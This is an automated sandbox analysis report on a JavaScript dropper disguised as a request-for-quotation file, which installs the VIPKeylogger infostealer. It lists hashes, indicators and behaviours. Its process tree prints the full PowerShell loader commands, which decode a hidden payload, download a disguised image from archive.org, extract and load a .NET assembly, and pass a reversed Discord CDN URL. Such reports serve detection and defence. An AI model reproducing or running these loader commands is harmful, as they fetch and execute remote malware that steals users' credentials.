Analysis

  • max time kernel
    141s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system
  • submitted
    29/08/2024, 05:55

General

  • Target

    RFQ-MR-24-09101 SPS.js

  • Size

    615KB

  • MD5

    816e7f77445ae08cda5ad3346fa8c8ff

  • SHA1

    ecb2b271b0b22b962ce264552bc5453eff755d97

  • SHA256

    7db5b864d7dc11b7523b182bafd5c9526343bfd9d2443fb0700588754c4cd551

  • SHA512

    1924fb265dd4e5e00b9293fce18fe831e2e8e6c5437873b0c6e2b6563204540595d0bea7f74d868a39e1727d77b483b434b48e0f2fcac02c8eeef989110f3423

  • SSDEEP

    12288:RvqUGASKJa54+3wlF6vRXUlOe8QkqRH9Dx5Ofk1oeQcaSc8+L2g7UH1sEP0ZNnlX:ZFh4ILqSFq

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs

    ps1.dropper

    https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

    exe.dropper

    https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

Extracted

  • Family

    vipkeylogger

Credentials

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copy of, the web browser credential store.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell and hides the display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\RFQ-MR-24-09101 SPS.js"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4092
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[encoded payload removed]';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('⼞ ⋄ ⍃ ⨞ ❄','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2360
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&91bcfd804a2673dfb54374d1c1b4c541cc5117ac50a4f497b66433fc4b66e6e5=mh&c14cec66=si&c9510d66=xe?txt.JJ/1319851109630428721/9941734063661597721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'terrestre','InstallUtil','desativado'))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3200
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\terrestre.js"
          4⤵
            PID:1136
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
            4⤵
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:624

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      f41839a3fe2888c8b3050197bc9a0a05

      SHA1

      0798941aaf7a53a11ea9ed589752890aee069729

      SHA256

      224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

      SHA512

      2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      d8b9a260789a22d72263ef3bb119108c

      SHA1

      376a9bd48726f422679f2cd65003442c0b6f6dd5

      SHA256

      d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

      SHA512

      550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_icqgfhde.g4z.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
